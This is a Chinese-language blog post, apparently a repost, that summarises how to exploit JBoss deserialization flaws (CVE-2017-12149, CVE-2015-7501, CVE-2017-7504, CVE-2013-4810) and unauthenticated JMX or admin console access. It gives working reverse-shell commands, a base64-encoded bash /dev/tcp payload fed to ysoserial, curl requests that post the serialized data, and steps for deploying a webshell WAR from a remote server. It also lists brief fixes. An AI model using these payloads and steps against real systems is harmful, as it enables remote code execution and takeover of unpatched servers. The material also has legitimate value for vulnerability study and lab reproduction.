漏洞复现 :JBoss漏洞总结

已于 2022-11-24 10:39:04 修改
阅读量1.7k 收藏 4
点赞数
分类专栏: 漏洞复现 文章标签: java 开发语言
于 2022-10-31 15:51:24 首次发布
原文链接:https://www.freebuf.com/articles/web/305144.html
版权

文章目录

反序列化

  1. 工具JavaDeserH2HC
    下载地址:joaomatosf/JavaDeserH2HC: Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC). (github.com)

  2. 使用ysoseriall和CommonsCollections5来生成序列化数据
    下载地址:frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. (github.com)

  3. 一个是jboss全反序列化漏洞检测的,使用方法就不介绍了,全中文+图形界面
    下载地址:https://cdn.vulhub.org/deserialization/DeserializeExploit.jar

  4. JexBoss工具,可以用来检测弱口令和反序列化
    下载地址:joaomatosf/jexboss: JexBoss: Jboss (and Java Deserialization Vulnerabilities) verify and EXploitation Tool (github.com)

JBoss 5.x/6.x 反序列化漏洞(CVE-2017-12149)

该漏洞存在于http invoker组件的ReadOnlyAccessFilter的doFilter中,在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化

在这里插入图片描述

漏洞验证:

访问:8080/invoker/readonly,页面返回状态码500说明存在漏洞

在这里插入图片描述

使用JavaDeserH2HC攻击

使用工具JavaDeserH2HC
下载地址:joaomatosf/JavaDeserH2HC: Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC). (github.com)

首先先设置监听

4
然后使用刚才下载的工具进行反弹shell

javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java 
//生成序列化数据

ReverseShellCommonsCollectionsHashMap.ser java -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap 监听ip:端口 
//以二进制格式发送ReverseShellCommonsCollectionsHashMap.ser包 

curl http://靶机ip:8080/invoker/readonly --data-binary @ReverseShellCommonsCollectionsHashMap.ser
注意:win主机.;  linux.:

这是可以看到反弹shell了
在这里插入图片描述

使用ysoserial反弹Shell

其实原理和上面的方法是一样的,就是生成一个序列化的数据然后发送报文,让其自动反序列化,只不过反弹的语句可控

将需要的反序列化命令通过网站加编码一次,网站地址:java.lang.Runtime.exec() Payload Workarounds - @Jackson_T (jackson-t.ca)

命令

bash -i >& /dev/tcp/192.168.200.42/6969 0>&1 
序列化
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC40Mi82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}

使用ysoseriall和CommonsCollections5来生成序列化数据,下载地址:frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization. (github.com)

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwMC40Mi82OTY5IDA+JjE=}|{base64,-d}|{bash,-i}" > hack.ser

然后就会生成一个hack.ser在文件夹下,把里面的内容作为poc,使用curl命令上传内容,当然要先设置监听

curl http://192.168.200.42:8080/invoker/readonly --data-binary @hack.ser

在这里插入图片描述
最后针对此漏洞再推荐几个脚本:

yunxu1/jboss-_CVE-2017-12149: CVE-2017-12149 jboss反序列化 可回显 (github.com)

sevck/CVE-2017-12149: CVE-2017-12149 JBOSS as 6.X反序列化(反弹shell版) (github.com)

防护

  1. 删除http-invoker.sar组件,路径如下jboss-6.1.0.Final\server\default\deploy\http-invoker.sar

  2. 升级JBoss

JBoss JMXInvokerServlet 反序列化漏洞(CVE-2015-7501)

原理其实和上面的差不多,流程也差不多

原理

JBoss中/invoker/JMXInvokerServlet路径对外开放,JBoss的jmx组件支持反序列化。JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

影响版本

JBoss Enterprise Application Platform 6.4.4,5.2.0,4.3.0_CP10
JBoss AS (Wildly) 6 and earlier
JBoss A-MQ 6.2.0
JBoss Fuse 6.2.0
JBoss SOA Platform (SOA-P) 5.3.1
JBoss Data Grid (JDG) 6.5.0
JBoss BRMS (BRMS) 6.1.0
JBoss BPMS (BPMS) 6.1.0
JBoss Data Virtualization (JDV) 6.1.0
JBoss Fuse Service Works (FSW) 6.0.0
JBoss Enterprise Web Server (EWS) 2.1,3.0

漏洞验证

访问:8080/invoker/JMXInvokerServlet,返回如下页面(下载文件),说明接口开放,此接口存在反序列化漏洞。设置好监听,用来接收shell

在这里插入图片描述
以下步骤和CVE-2017-12149步骤一样

Boss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)

适用范围:

Jboss AS 4.x及之前版本

漏洞验证:

访问/jbossmq-httpil/HTTPServerILServlet,出现以下页面代表存在漏洞

在这里插入图片描述
利用步骤同上

JBoss EJBInvokerServlet 反序列化漏洞(CVE-2013-4810)

影响版本:
jboss 6.x 版本

漏洞验证:

访问/invoker/EJBInvokerServlet,如果如下图所示代表存在此漏洞

在这里插入图片描述
步骤同上

Jboss未授权访问漏洞合集

JBoss 4

在这里插入图片描述
打开控制台
在这里插入图片描述
密码文件:server/default/conf/props/jmx-console-users.properties
进入控制台后找到
在这里插入图片描述

打开后找到addurl栏,这里有两个栏,一个是java.net.url,另一个是java.net.string,似乎不管是那个都可以
在这里插入图片描述

打war包

jar -cvf war包 目标文件名

使用python启动一个http服务

python -m http.server

在这里插入图片描述
访问一下能够访问到
在这里插入图片描述

在这里插入图片描述

点击invoke后显示
在这里插入图片描述

返回之后可以看到部署的物理位置

在这里插入图片描述
在这里插入图片描述
访问一下可以访问到,证明已经上传成功

在这里插入图片描述

理论上如果成功上传后,在控制台页面的jboss.web.deployment会显示包

在这里插入图片描述
如果部署成功,就可以打开包页面,假设刚才上传的包名为shell.war,所以要打开:8080/shell/,然后就会看到包里面的内容,如果里面有一个名为hack.jsp的木马,那么我们就可以打开:8080/shell/hack.jsp,然后连接即可

Jboss6

流程和4差不多,只不过页面不一样了

搭建完后打开,同样打开JMX Cpnsole
密码文件路径:/server/default/conf/props/jbossws-users.properties
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
然后把页面拉到最下面,找到两个deploy的标签,在框内输入war包的地址,然后点击invoke
在这里插入图片描述
然后和jboss4一样访问页面即可

JBoss Administration Console

首先打开Administration Console
登入后打开Web Application (WAR) 页面,上传恶意WAR包

在这里插入图片描述
上传成功后查看一下上传的包是否正常开启,默认是正常开启

在这里插入图片描述
如果不开启则要手动开启

在这里插入图片描述
然后访问8080/hack/hack.jsp即可,路径为war内文件名

msf成功反弹shell

在这里插入图片描述

转载

漏洞复现 :JBoss漏洞总结

空白行
关注
专栏目录
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
weixin_54626591的博客
05-06 247
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞(CVE-2017-7504)
web渗透测试漏洞复现:未授权访问漏洞合集
HACKONE的博客
03-19 321
Jupyter Notebook 未授权访问。Elasticsearch 未授权访问。Active MQ 未授权访问。Memcached 未授权访问。ZooKeeper 未授权访问。RabbitMQ 未授权访问。Weblogic 未授权访问。CouchDB 未授权访问。Jenkins 未授权访问。MongoDB 未授权访问。Docker 未授权访问。Hadoop 未授权访问。Kibana 未授权访问。Zabbix 未授权访问。Dubbo 未授权访问。Druid 未授权访问。JBoss 未授权访问。
JBoss系列漏洞复现以及实战心得
jammny
09-10 2010
前言 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 谷歌语法:inurl:/console/ intitle:"JBoss Management" 一、JBoss JMXInvokerServlet 反序列化漏洞 JBoss在.
jboss漏洞复现
赵花花08042的博客
12-13 759
JBoss JMXInvokerServlet 反序列化漏洞 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ https://paper.seebug.org/312/ https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的
Jboss】常见漏洞复现
m0_59151303的博客
08-06 1232
JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
Jboss漏洞复现(附带修复方法)
C233333235的博客
08-07 1280
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中 免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼ 服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域, JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发, 这使得JBoss⼴为流⾏。
中间件漏洞 -- JBoss
weixin_44769042的博客
11-17 4496
中间件漏洞记录--5 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。默认端口:8080,9990 目录 一、JBoss JMXInvokerServlet 反序列化漏洞 1、环境搭建:docker + vulh...
JBoss漏洞复现(保姆级教学)
m0_69043895的博客
04-25 734
漏洞原理:该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。访问http://192.10.131.8:8080/invoker/readonly,若返回如下界面则存在漏洞。这个时候,可以通过执行命令在kali上反弹shell,需要将命令进行base64编码。在自己服务器上部署一个webshell的war包。然后再压缩成war文件。
漏洞复现JBoss(CVE-2017-12149)反序列化漏洞
做自己喜欢的事,并将其发挥到极致!
03-24 597
文章目录声明前言一、漏洞描述二、漏洞原理三、漏洞分析JBoss反序列化漏洞分析四、影响版本五、漏洞利用实战复现六、漏洞修复修复原理方法一方法二方法三 声明 本篇文章仅用于漏洞研究和技术学习,切勿用于未授权下的渗透测试行为,切记! 前言 JBoss 存在反序列化漏洞,攻击者利用漏洞可在未经任何身份验证的服务器主机上执行任意代码。漏洞危害程度为高危。 一、漏洞描述 JBoss是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3的规范。 在 /invoker/readonly 路径下
漏洞复现Jboss反序列化漏洞(CVE-2017-12149)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-17 908
JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用CVE-2017-12149漏洞:该漏洞Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter ,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据流进行反序列化,导致攻击者可以通过精心设计的序列化数据来执行任意代码。............
漏洞复现Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504
weixin_45556536的博客
11-12 852
Jboss反序列化漏洞利用CVE-2017-12149/CVE-2017-7504基础知识漏洞原理影响版本复现思路复现—CVE-2017-121491、特征检测2、反弹shell复现—CVE-2017-75041、特征检测2、反弹shell 基础知识   序列化就是把对象转换成字节流,便于保存在内存、文件、数据库中;反序列化即逆过程,由字节流还原成对象。   Java中的ObjectOutputStream类的writeObject()方法可以实现序列化,ObjectInputStream类的readObj
Jboss漏洞利用小工具
09-01
Jboss漏洞利用的小工具。执行命令一次不行可以尝试多次执行
JBoss 相关漏洞复现及利用
weixin_45908624的博客
09-21 1256
JBoss Application Server 相关漏洞复现
Jboss 漏洞复现
最新发布
2301_80402555的博客
09-22 773
2、找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下。2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署。4、制作war包 填写war包远程地址。
JBoss 漏洞复现
m0_43397796的博客
03-02 4090
JBoss 漏洞复现 CVE-2017-12149 JBoss AS 5.X/6.X反序列化漏洞 漏洞扫描 试验地址:https://www.hetianlab.com/expc.do?w=exp_ass&ec=ECIDb56f-ab5c-4e92-840f-d59299ec273f 由于实验指导书上的ip有错误,所以先nmap扫描一下ipnmap -sn 10.1.1.0/24 发现4个ip 全端口扫描nmap -p- -sV -T4 10.1.1.254 10.1.1.135 10.1.1.9
jboss反序列化漏洞复现(CVE-2017-7504)
WY92139010的博客
07-31 601
jboss反序列化漏洞复现(CVE-2017-7504) 一、漏洞描述 Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。 二、漏洞环境搭建以及复现 1、使用docker搭建漏洞环境...
jboss中间件漏洞复现
mingyqf的博客
02-15 1481
参考:https://blog.csdn.net/cj_Allen/article/details/109522771 JBOSS简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于J
JBoss漏洞总结复现
1ance's blog
10-08 2393
目录简介JBoss发序列化漏洞(CVE-2017-12149)漏洞描述漏洞原理影响范围漏洞复现修复建议JBossMQ JMS反序列化漏洞(CVE-2017-7504)漏洞描述漏洞原理影响范围复现过程修复建议JBoss JMXInvokerServlet反序列化漏洞(CVE-2015-7501)漏洞描述漏洞原理影响范围复现过程修复建议JBoss EJBInvokerServlet 反序列化漏洞(CVE-2013-4810)漏洞描述影响范围复现过程修复建议总结 简介 Jboss是一个基于J2EE的开放源代码的
中间件漏洞详解:Tomcat、Weblogic、Nginx、JBOSS安全总结
“常见中间件漏洞总结PPT,涵盖了包括Tomcat、Weblogic、Nginx、IIS、Jboss在内的多种中间件的常见安全漏洞和相关知识,适合培训和学习。” 在IT行业中,中间件扮演着至关重要的角色,它是一种介于操作系统和应用...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值